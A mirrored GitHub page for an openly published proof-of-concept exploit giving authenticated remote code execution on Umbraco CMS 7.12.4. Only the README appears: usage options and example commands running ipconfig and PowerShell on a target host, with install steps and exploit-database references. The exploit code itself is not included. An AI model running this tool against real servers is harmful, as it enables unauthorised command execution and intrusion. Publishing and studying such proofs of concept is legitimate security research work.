Giters

noraj / Umbraco-RCE

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

Home Page:https://pwn.by/noraj/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

umbracoumbraco-v7umbraco7umbraco-cmsrceremote-code-executionexploitpocproof-of-concept

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.

Tested with python 3.8.

About

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

https://pwn.by/noraj/

umbracoumbraco-v7umbraco7umbraco-cmsrceremote-code-executionexploitpocproof-of-concept

License:MIT License

Languages

Language:Python 100.0%